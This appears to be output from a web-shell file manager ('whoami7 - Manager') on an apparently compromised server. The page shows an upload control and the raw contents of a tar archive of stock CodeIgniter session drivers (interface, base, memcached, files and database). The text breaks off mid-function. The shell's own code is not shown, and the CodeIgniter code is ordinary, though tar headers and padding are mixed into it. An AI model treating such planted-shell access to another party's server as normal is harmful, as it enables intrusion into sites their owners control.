whoami7 - Manager
:
/
proc
/
self
/
root
/
home
/
papecmvm
/
www
/
documents
/
6204_Rajpara
/
2020
/
k_november
/
receipt
/
Upload File:
files >> //proc/self/root/home/papecmvm/www/documents/6204_Rajpara/2020/k_november/receipt/Session.tar
SessionHandlerInterface.php�������������������������������������������������������������������������0000644�����������������00000004302�14656034012�0012017 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * CodeIgniter * * An open source application development framework for PHP * * This content is released under the MIT License (MIT) * * Copyright (c) 2014 - 2019, British Columbia Institute of Technology * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * @package CodeIgniter * @author EllisLab Dev Team * @copyright Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/) * @copyright Copyright (c) 2014 - 2019, British Columbia Institute of Technology (http://bcit.ca/) * @license http://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com * @since Version 3.0.0 * @filesource */ defined('BASEPATH') OR exit('No direct script access allowed'); /** * SessionHandlerInterface * * PHP 5.4 compatibility interface * * @package CodeIgniter * @subpackage Libraries * @category Sessions * @author Andrey Andreev * @link https://codeigniter.com/user_guide/libraries/sessions.html */ interface SessionHandlerInterface { public function open($save_path, $name); public function close(); public function read($session_id); public function write($session_id, $session_data); public function destroy($session_id); public function gc($maxlifetime); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Session_driver.php����������������������������������������������������������������������������������0000644�����������������00000011075�14656034012�0010260 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * CodeIgniter * * An open source application development framework for PHP * * This content is released under the MIT License (MIT) * * Copyright (c) 2014 - 2019, British Columbia Institute of Technology * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * @package CodeIgniter * @author EllisLab Dev Team * @copyright Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/) * @copyright Copyright (c) 2014 - 2019, British Columbia Institute of Technology (https://bcit.ca/) * @license https://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com * @since Version 3.0.0 * @filesource */ defined('BASEPATH') OR exit('No direct script access allowed'); /** * CodeIgniter Session Driver Class * * @package CodeIgniter * @subpackage Libraries * @category Sessions * @author Andrey Andreev * @link https://codeigniter.com/user_guide/libraries/sessions.html */ abstract class CI_Session_driver implements SessionHandlerInterface { protected $_config; /** * Data fingerprint * * @var bool */ protected $_fingerprint; /** * Lock placeholder * * @var mixed */ protected $_lock = FALSE; /** * Read session ID * * Used to detect session_regenerate_id() calls because PHP only calls * write() after regenerating the ID. * * @var string */ protected $_session_id; /** * Success and failure return values * * Necessary due to a bug in all PHP 5 versions where return values * from userspace handlers are not handled properly. PHP 7 fixes the * bug, so we need to return different values depending on the version. * * @see https://wiki.php.net/rfc/session.user.return-value * @var mixed */ protected $_success, $_failure; // ------------------------------------------------------------------------ /** * Class constructor * * @param array $params Configuration parameters * @return void */ public function __construct(&$params) { $this->_config =& $params; if (is_php('7')) { $this->_success = TRUE; $this->_failure = FALSE; } else { $this->_success = 0; $this->_failure = -1; } } // ------------------------------------------------------------------------ /** * PHP 5.x validate ID * * Enforces session.use_strict_mode * * @return void */ public function php5_validate_id() { if (isset($_COOKIE[$this->_config['cookie_name']]) && ! $this->validateSessionId($_COOKIE[$this->_config['cookie_name']])) { unset($_COOKIE[$this->_config['cookie_name']]); } } // ------------------------------------------------------------------------ /** * Cookie destroy * * Internal method to force removal of a cookie by the client * when session_destroy() is called. * * @return bool */ protected function _cookie_destroy() { return setcookie( $this->_config['cookie_name'], NULL, 1, $this->_config['cookie_path'], $this->_config['cookie_domain'], $this->_config['cookie_secure'], TRUE ); } // ------------------------------------------------------------------------ /** * Get lock * * A dummy method allowing drivers with no locking functionality * (databases other than PostgreSQL and MySQL) to act as if they * do acquire a lock. * * @param string $session_id * @return bool */ protected function _get_lock($session_id) { $this->_lock = TRUE; return TRUE; } // ------------------------------------------------------------------------ /** * Release lock * * @return bool */ protected function _release_lock() { if ($this->_lock) { $this->_lock = FALSE; } return TRUE; } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������drivers/Session_memcached_driver.php����������������������������������������������������������������0000644�����������������00000023634�14656034013�0013731 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * CodeIgniter * * An open source application development framework for PHP * * This content is released under the MIT License (MIT) * * Copyright (c) 2014 - 2019, British Columbia Institute of Technology * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * @package CodeIgniter * @author EllisLab Dev Team * @copyright Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/) * @copyright Copyright (c) 2014 - 2019, British Columbia Institute of Technology (https://bcit.ca/) * @license https://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com * @since Version 3.0.0 * @filesource */ defined('BASEPATH') OR exit('No direct script access allowed'); /** * CodeIgniter Session Memcached Driver * * @package CodeIgniter * @subpackage Libraries * @category Sessions * @author Andrey Andreev * @link https://codeigniter.com/user_guide/libraries/sessions.html */ class CI_Session_memcached_driver extends CI_Session_driver implements SessionHandlerInterface { /** * Memcached instance * * @var Memcached */ protected $_memcached; /** * Key prefix * * @var string */ protected $_key_prefix = 'ci_session:'; /** * Lock key * * @var string */ protected $_lock_key; // ------------------------------------------------------------------------ /** * Class constructor * * @param array $params Configuration parameters * @return void */ public function __construct(&$params) { parent::__construct($params); if (empty($this->_config['save_path'])) { log_message('error', 'Session: No Memcached save path configured.'); } if ($this->_config['match_ip'] === TRUE) { $this->_key_prefix .= $_SERVER['REMOTE_ADDR'].':'; } } // ------------------------------------------------------------------------ /** * Open * * Sanitizes save_path and initializes connections. * * @param string $save_path Server path(s) * @param string $name Session cookie name, unused * @return bool */ public function open($save_path, $name) { $this->_memcached = new Memcached(); $this->_memcached->setOption(Memcached::OPT_BINARY_PROTOCOL, TRUE); // required for touch() usage $server_list = array(); foreach ($this->_memcached->getServerList() as $server) { $server_list[] = $server['host'].':'.$server['port']; } if ( ! preg_match_all('#,?([^,:]+)\:(\d{1,5})(?:\:(\d+))?#', $this->_config['save_path'], $matches, PREG_SET_ORDER)) { $this->_memcached = NULL; log_message('error', 'Session: Invalid Memcached save path format: '.$this->_config['save_path']); return $this->_failure; } foreach ($matches as $match) { // If Memcached already has this server (or if the port is invalid), skip it if (in_array($match[1].':'.$match[2], $server_list, TRUE)) { log_message('debug', 'Session: Memcached server pool already has '.$match[1].':'.$match[2]); continue; } if ( ! $this->_memcached->addServer($match[1], $match[2], isset($match[3]) ? $match[3] : 0)) { log_message('error', 'Could not add '.$match[1].':'.$match[2].' to Memcached server pool.'); } else { $server_list[] = $match[1].':'.$match[2]; } } if (empty($server_list)) { log_message('error', 'Session: Memcached server pool is empty.'); return $this->_failure; } $this->php5_validate_id(); return $this->_success; } // ------------------------------------------------------------------------ /** * Read * * Reads session data and acquires a lock * * @param string $session_id Session ID * @return string Serialized session data */ public function read($session_id) { if (isset($this->_memcached) && $this->_get_lock($session_id)) { // Needed by write() to detect session_regenerate_id() calls $this->_session_id = $session_id; $session_data = (string) $this->_memcached->get($this->_key_prefix.$session_id); $this->_fingerprint = md5($session_data); return $session_data; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Write * * Writes (create / update) session data * * @param string $session_id Session ID * @param string $session_data Serialized session data * @return bool */ public function write($session_id, $session_data) { if ( ! isset($this->_memcached, $this->_lock_key)) { return $this->_failure; } // Was the ID regenerated? elseif ($session_id !== $this->_session_id) { if ( ! $this->_release_lock() OR ! $this->_get_lock($session_id)) { return $this->_failure; } $this->_fingerprint = md5(''); $this->_session_id = $session_id; } $key = $this->_key_prefix.$session_id; $this->_memcached->replace($this->_lock_key, time(), 300); if ($this->_fingerprint !== ($fingerprint = md5($session_data))) { if ($this->_memcached->set($key, $session_data, $this->_config['expiration'])) { $this->_fingerprint = $fingerprint; return $this->_success; } return $this->_failure; } elseif ( $this->_memcached->touch($key, $this->_config['expiration']) OR ($this->_memcached->getResultCode() === Memcached::RES_NOTFOUND && $this->_memcached->set($key, $session_data, $this->_config['expiration'])) ) { return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Close * * Releases locks and closes connection. * * @return bool */ public function close() { if (isset($this->_memcached)) { $this->_release_lock(); if ( ! $this->_memcached->quit()) { return $this->_failure; } $this->_memcached = NULL; return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Destroy * * Destroys the current session. * * @param string $session_id Session ID * @return bool */ public function destroy($session_id) { if (isset($this->_memcached, $this->_lock_key)) { $this->_memcached->delete($this->_key_prefix.$session_id); $this->_cookie_destroy(); return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Garbage Collector * * Deletes expired sessions * * @param int $maxlifetime Maximum lifetime of sessions * @return bool */ public function gc($maxlifetime) { // Not necessary, Memcached takes care of that. return $this->_success; } // -------------------------------------------------------------------- /** * Validate ID * * Checks whether a session ID record exists server-side, * to enforce session.use_strict_mode. * * @param string $id * @return bool */ public function validateSessionId($id) { $this->_memcached->get($this->_key_prefix.$id); return ($this->_memcached->getResultCode() === Memcached::RES_SUCCESS); } // ------------------------------------------------------------------------ /** * Get lock * * Acquires an (emulated) lock. * * @param string $session_id Session ID * @return bool */ protected function _get_lock($session_id) { // PHP 7 reuses the SessionHandler object on regeneration, // so we need to check here if the lock key is for the // correct session ID. if ($this->_lock_key === $this->_key_prefix.$session_id.':lock') { if ( ! $this->_memcached->replace($this->_lock_key, time(), 300)) { return ($this->_memcached->getResultCode() === Memcached::RES_NOTFOUND) ? $this->_memcached->add($this->_lock_key, time(), 300) : FALSE; } return TRUE; } // 30 attempts to obtain a lock, in case another request already has it $lock_key = $this->_key_prefix.$session_id.':lock'; $attempt = 0; do { if ($this->_memcached->get($lock_key)) { sleep(1); continue; } $method = ($this->_memcached->getResultCode() === Memcached::RES_NOTFOUND) ? 'add' : 'set'; if ( ! $this->_memcached->$method($lock_key, time(), 300)) { log_message('error', 'Session: Error while trying to obtain lock for '.$this->_key_prefix.$session_id); return FALSE; } $this->_lock_key = $lock_key; break; } while (++$attempt < 30); if ($attempt === 30) { log_message('error', 'Session: Unable to obtain lock for '.$this->_key_prefix.$session_id.' after 30 attempts, aborting.'); return FALSE; } $this->_lock = TRUE; return TRUE; } // ------------------------------------------------------------------------ /** * Release lock * * Releases a previously acquired lock * * @return bool */ protected function _release_lock() { if (isset($this->_memcached, $this->_lock_key) && $this->_lock) { if ( ! $this->_memcached->delete($this->_lock_key) && $this->_memcached->getResultCode() !== Memcached::RES_NOTFOUND) { log_message('error', 'Session: Error while trying to free lock for '.$this->_lock_key); return FALSE; } $this->_lock_key = NULL; $this->_lock = FALSE; } return TRUE; } } ����������������������������������������������������������������������������������������������������drivers/Session_files_driver.php��������������������������������������������������������������������0000644�����������������00000025263�14656034014�0013126 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * CodeIgniter * * An open source application development framework for PHP * * This content is released under the MIT License (MIT) * * Copyright (c) 2014 - 2019, British Columbia Institute of Technology * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * @package CodeIgniter * @author EllisLab Dev Team * @copyright Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/) * @copyright Copyright (c) 2014 - 2019, British Columbia Institute of Technology (https://bcit.ca/) * @license https://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com * @since Version 3.0.0 * @filesource */ defined('BASEPATH') OR exit('No direct script access allowed'); /** * CodeIgniter Session Files Driver * * @package CodeIgniter * @subpackage Libraries * @category Sessions * @author Andrey Andreev * @link https://codeigniter.com/user_guide/libraries/sessions.html */ class CI_Session_files_driver extends CI_Session_driver implements SessionHandlerInterface { /** * Save path * * @var string */ protected $_save_path; /** * File handle * * @var resource */ protected $_file_handle; /** * File name * * @var resource */ protected $_file_path; /** * File new flag * * @var bool */ protected $_file_new; /** * Validate SID regular expression * * @var string */ protected $_sid_regexp; /** * mbstring.func_overload flag * * @var bool */ protected static $func_overload; // ------------------------------------------------------------------------ /** * Class constructor * * @param array $params Configuration parameters * @return void */ public function __construct(&$params) { parent::__construct($params); if (isset($this->_config['save_path'])) { $this->_config['save_path'] = rtrim($this->_config['save_path'], '/\\'); ini_set('session.save_path', $this->_config['save_path']); } else { log_message('debug', 'Session: "sess_save_path" is empty; using "session.save_path" value from php.ini.'); $this->_config['save_path'] = rtrim(ini_get('session.save_path'), '/\\'); } $this->_sid_regexp = $this->_config['_sid_regexp']; isset(self::$func_overload) OR self::$func_overload = (extension_loaded('mbstring') && ini_get('mbstring.func_overload')); } // ------------------------------------------------------------------------ /** * Open * * Sanitizes the save_path directory. * * @param string $save_path Path to session files' directory * @param string $name Session cookie name * @return bool */ public function open($save_path, $name) { if ( ! is_dir($save_path)) { if ( ! mkdir($save_path, 0700, TRUE)) { log_message('error', "Session: Configured save path '".$this->_config['save_path']."' is not a directory, doesn't exist or cannot be created."); return $this->_failure; } } elseif ( ! is_writable($save_path)) { log_message('error', "Session: Configured save path '".$this->_config['save_path']."' is not writable by the PHP process."); return $this->_failure; } $this->_config['save_path'] = $save_path; $this->_file_path = $this->_config['save_path'].DIRECTORY_SEPARATOR .$name // we'll use the session cookie name as a prefix to avoid collisions .($this->_config['match_ip'] ? md5($_SERVER['REMOTE_ADDR']) : ''); $this->php5_validate_id(); return $this->_success; } // ------------------------------------------------------------------------ /** * Read * * Reads session data and acquires a lock * * @param string $session_id Session ID * @return string Serialized session data */ public function read($session_id) { // This might seem weird, but PHP 5.6 introduces session_reset(), // which re-reads session data if ($this->_file_handle === NULL) { $this->_file_new = ! file_exists($this->_file_path.$session_id); if (($this->_file_handle = fopen($this->_file_path.$session_id, 'c+b')) === FALSE) { log_message('error', "Session: Unable to open file '".$this->_file_path.$session_id."'."); return $this->_failure; } if (flock($this->_file_handle, LOCK_EX) === FALSE) { log_message('error', "Session: Unable to obtain lock for file '".$this->_file_path.$session_id."'."); fclose($this->_file_handle); $this->_file_handle = NULL; return $this->_failure; } // Needed by write() to detect session_regenerate_id() calls $this->_session_id = $session_id; if ($this->_file_new) { chmod($this->_file_path.$session_id, 0600); $this->_fingerprint = md5(''); return ''; } } // We shouldn't need this, but apparently we do ... // See https://github.com/bcit-ci/CodeIgniter/issues/4039 elseif ($this->_file_handle === FALSE) { return $this->_failure; } else { rewind($this->_file_handle); } $session_data = ''; for ($read = 0, $length = filesize($this->_file_path.$session_id); $read < $length; $read += self::strlen($buffer)) { if (($buffer = fread($this->_file_handle, $length - $read)) === FALSE) { break; } $session_data .= $buffer; } $this->_fingerprint = md5($session_data); return $session_data; } // ------------------------------------------------------------------------ /** * Write * * Writes (create / update) session data * * @param string $session_id Session ID * @param string $session_data Serialized session data * @return bool */ public function write($session_id, $session_data) { // If the two IDs don't match, we have a session_regenerate_id() call // and we need to close the old handle and open a new one if ($session_id !== $this->_session_id && ($this->close() === $this->_failure OR $this->read($session_id) === $this->_failure)) { return $this->_failure; } if ( ! is_resource($this->_file_handle)) { return $this->_failure; } elseif ($this->_fingerprint === md5($session_data)) { return ( ! $this->_file_new && ! touch($this->_file_path.$session_id)) ? $this->_failure : $this->_success; } if ( ! $this->_file_new) { ftruncate($this->_file_handle, 0); rewind($this->_file_handle); } if (($length = strlen($session_data)) > 0) { for ($written = 0; $written < $length; $written += $result) { if (($result = fwrite($this->_file_handle, substr($session_data, $written))) === FALSE) { break; } } if ( ! is_int($result)) { $this->_fingerprint = md5(substr($session_data, 0, $written)); log_message('error', 'Session: Unable to write data.'); return $this->_failure; } } $this->_fingerprint = md5($session_data); return $this->_success; } // ------------------------------------------------------------------------ /** * Close * * Releases locks and closes file descriptor. * * @return bool */ public function close() { if (is_resource($this->_file_handle)) { flock($this->_file_handle, LOCK_UN); fclose($this->_file_handle); $this->_file_handle = $this->_file_new = $this->_session_id = NULL; } return $this->_success; } // ------------------------------------------------------------------------ /** * Destroy * * Destroys the current session. * * @param string $session_id Session ID * @return bool */ public function destroy($session_id) { if ($this->close() === $this->_success) { if (file_exists($this->_file_path.$session_id)) { $this->_cookie_destroy(); return unlink($this->_file_path.$session_id) ? $this->_success : $this->_failure; } return $this->_success; } elseif ($this->_file_path !== NULL) { clearstatcache(); if (file_exists($this->_file_path.$session_id)) { $this->_cookie_destroy(); return unlink($this->_file_path.$session_id) ? $this->_success : $this->_failure; } return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Garbage Collector * * Deletes expired sessions * * @param int $maxlifetime Maximum lifetime of sessions * @return bool */ public function gc($maxlifetime) { if ( ! is_dir($this->_config['save_path']) OR ($directory = opendir($this->_config['save_path'])) === FALSE) { log_message('debug', "Session: Garbage collector couldn't list files under directory '".$this->_config['save_path']."'."); return $this->_failure; } $ts = time() - $maxlifetime; $pattern = ($this->_config['match_ip'] === TRUE) ? '[0-9a-f]{32}' : ''; $pattern = sprintf( '#\A%s'.$pattern.$this->_sid_regexp.'\z#', preg_quote($this->_config['cookie_name']) ); while (($file = readdir($directory)) !== FALSE) { // If the filename doesn't match this pattern, it's either not a session file or is not ours if ( ! preg_match($pattern, $file) OR ! is_file($this->_config['save_path'].DIRECTORY_SEPARATOR.$file) OR ($mtime = filemtime($this->_config['save_path'].DIRECTORY_SEPARATOR.$file)) === FALSE OR $mtime > $ts) { continue; } unlink($this->_config['save_path'].DIRECTORY_SEPARATOR.$file); } closedir($directory); return $this->_success; } // -------------------------------------------------------------------- /** * Validate ID * * Checks whether a session ID record exists server-side, * to enforce session.use_strict_mode. * * @param string $id * @return bool */ public function validateSessionId($id) { $result = is_file($this->_file_path.$id); clearstatcache(TRUE, $this->_file_path.$id); return $result; } // -------------------------------------------------------------------- /** * Byte-safe strlen() * * @param string $str * @return int */ protected static function strlen($str) { return (self::$func_overload) ? mb_strlen($str, '8bit') : strlen($str); } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������drivers/Session_database_driver.php�����������������������������������������������������������������0000644�����������������00000025632�14656034014�0013570 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php /** * CodeIgniter * * An open source application development framework for PHP * * This content is released under the MIT License (MIT) * * Copyright (c) 2014 - 2019, British Columbia Institute of Technology * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * @package CodeIgniter * @author EllisLab Dev Team * @copyright Copyright (c) 2008 - 2014, EllisLab, Inc. (https://ellislab.com/) * @copyright Copyright (c) 2014 - 2019, British Columbia Institute of Technology (https://bcit.ca/) * @license https://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com * @since Version 3.0.0 * @filesource */ defined('BASEPATH') OR exit('No direct script access allowed'); /** * CodeIgniter Session Database Driver * * @package CodeIgniter * @subpackage Libraries * @category Sessions * @author Andrey Andreev * @link https://codeigniter.com/user_guide/libraries/sessions.html */ class CI_Session_database_driver extends CI_Session_driver implements SessionHandlerInterface { /** * DB object * * @var object */ protected $_db; /** * Row exists flag * * @var bool */ protected $_row_exists = FALSE; /** * Lock "driver" flag * * @var string */ protected $_platform; // ------------------------------------------------------------------------ /** * Class constructor * * @param array $params Configuration parameters * @return void */ public function __construct(&$params) { parent::__construct($params); $CI =& get_instance(); isset($CI->db) OR $CI->load->database(); $this->_db = $CI->db; if ( ! $this->_db instanceof CI_DB_query_builder) { throw new Exception('Query Builder not enabled for the configured database. Aborting.'); } elseif ($this->_db->pconnect) { throw new Exception('Configured database connection is persistent. Aborting.'); } elseif ($this->_db->cache_on) { throw new Exception('Configured database connection has cache enabled. Aborting.'); } $db_driver = $this->_db->dbdriver.(empty($this->_db->subdriver) ? '' : '_'.$this->_db->subdriver); if (strpos($db_driver, 'mysql') !== FALSE) { $this->_platform = 'mysql'; } elseif (in_array($db_driver, array('postgre', 'pdo_pgsql'), TRUE)) { $this->_platform = 'postgre'; } // Note: BC work-around for the old 'sess_table_name' setting, should be removed in the future. if ( ! isset($this->_config['save_path']) && ($this->_config['save_path'] = config_item('sess_table_name'))) { log_message('debug', 'Session: "sess_save_path" is empty; using BC fallback to "sess_table_name".'); } } // ------------------------------------------------------------------------ /** * Open * * Initializes the database connection * * @param string $save_path Table name * @param string $name Session cookie name, unused * @return bool */ public function open($save_path, $name) { if (empty($this->_db->conn_id) && ! $this->_db->db_connect()) { return $this->_failure; } $this->php5_validate_id(); return $this->_success; } // ------------------------------------------------------------------------ /** * Read * * Reads session data and acquires a lock * * @param string $session_id Session ID * @return string Serialized session data */ public function read($session_id) { if ($this->_get_lock($session_id) === FALSE) { return $this->_failure; } // Prevent previous QB calls from messing with our queries $this->_db->reset_query(); // Needed by write() to detect session_regenerate_id() calls $this->_session_id = $session_id; $this->_db ->select('data') ->from($this->_config['save_path']) ->where('id', $session_id); if ($this->_config['match_ip']) { $this->_db->where('ip_address', $_SERVER['REMOTE_ADDR']); } if ( ! ($result = $this->_db->get()) OR ($result = $result->row()) === NULL) { // PHP7 will reuse the same SessionHandler object after // ID regeneration, so we need to explicitly set this to // FALSE instead of relying on the default ... $this->_row_exists = FALSE; $this->_fingerprint = md5(''); return ''; } // PostgreSQL's variant of a BLOB datatype is Bytea, which is a // PITA to work with, so we use base64-encoded data in a TEXT // field instead. $result = ($this->_platform === 'postgre') ? base64_decode(rtrim($result->data)) : $result->data; $this->_fingerprint = md5($result); $this->_row_exists = TRUE; return $result; } // ------------------------------------------------------------------------ /** * Write * * Writes (create / update) session data * * @param string $session_id Session ID * @param string $session_data Serialized session data * @return bool */ public function write($session_id, $session_data) { // Prevent previous QB calls from messing with our queries $this->_db->reset_query(); // Was the ID regenerated? if (isset($this->_session_id) && $session_id !== $this->_session_id) { if ( ! $this->_release_lock() OR ! $this->_get_lock($session_id)) { return $this->_failure; } $this->_row_exists = FALSE; $this->_session_id = $session_id; } elseif ($this->_lock === FALSE) { return $this->_failure; } if ($this->_row_exists === FALSE) { $insert_data = array( 'id' => $session_id, 'ip_address' => $_SERVER['REMOTE_ADDR'], 'timestamp' => time(), 'data' => ($this->_platform === 'postgre' ? base64_encode($session_data) : $session_data) ); if ($this->_db->insert($this->_config['save_path'], $insert_data)) { $this->_fingerprint = md5($session_data); $this->_row_exists = TRUE; return $this->_success; } return $this->_failure; } $this->_db->where('id', $session_id); if ($this->_config['match_ip']) { $this->_db->where('ip_address', $_SERVER['REMOTE_ADDR']); } $update_data = array('timestamp' => time()); if ($this->_fingerprint !== md5($session_data)) { $update_data['data'] = ($this->_platform === 'postgre') ? base64_encode($session_data) : $session_data; } if ($this->_db->update($this->_config['save_path'], $update_data)) { $this->_fingerprint = md5($session_data); return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Close * * Releases locks * * @return bool */ public function close() { return ($this->_lock && ! $this->_release_lock()) ? $this->_failure : $this->_success; } // ------------------------------------------------------------------------ /** * Destroy * * Destroys the current session. * * @param string $session_id Session ID * @return bool */ public function destroy($session_id) { if ($this->_lock) { // Prevent previous QB calls from messing with our queries $this->_db->reset_query(); $this->_db->where('id', $session_id); if ($this->_config['match_ip']) { $this->_db->where('ip_address', $_SERVER['REMOTE_ADDR']); } if ( ! $this->_db->delete($this->_config['save_path'])) { return $this->_failure; } } if ($this->close() === $this->_success) { $this->_cookie_destroy(); return $this->_success; } return $this->_failure; } // ------------------------------------------------------------------------ /** * Garbage Collector * * Deletes expired sessions * * @param int $maxlifetime Maximum lifetime of sessions * @return bool */ public function gc($maxlifetime) { // Prevent previous QB calls from messing with our queries $this->_db->reset_query(); return ($this->_db->delete($this->_config['save_path'], 'timestamp < '.(time() - $maxlifetime))) ? $this->_success : $this->_failure; } // -------------------------------------------------------------------- /** * Validate ID * * Checks whether a session ID record exists server-side, * to enforce session.use_strict_mode. * * @param string $id * @return bool */ public function validateSessionId($id) { // Prevent previous QB calls from messing with our queries $this->_db->reset_query(); $this->_db->select('1')->from($this->_config['save_path'])->where('id', $id); empty($this->_config['match_ip']) OR $this->_db->where('ip_address', $_SERVER['REMOTE_ADDR']); $result = $this->_db->get(); empty($result) OR $result = $result->row(); return ! empty($result); } // ------------------------------------------------------------------------ /** * Get lock * * Acquires a lock, depending on the underlying platform. * * @param string $session_id Session ID * @return bool */ protected function _get_lock($session_id) { if ($this->_platform === 'mysql') { $arg = md5($session_id.($this->_config['match_ip'] ? '_'.$_SERVER['REMOTE_ADDR'] : '')); if ($this->_db->query("SELECT GET_LOCK('".$arg."', 300) AS ci_session_lock")->row()->ci_session_lock) { $this->_lock = $arg; return TRUE; } return FALSE; } elseif ($this->_platform === 'postgre') { $arg = "hashtext('".$session_id."')".($this->_config['match_ip'] ? ", hashtext('".$_SERVER['REMOTE_ADDR']."')" : ''); if ($this->_db->simple_query('SELECT pg_advisory_lock('.$arg.')')) { $this->_lock = $arg; return TRUE; } return FALSE; } return 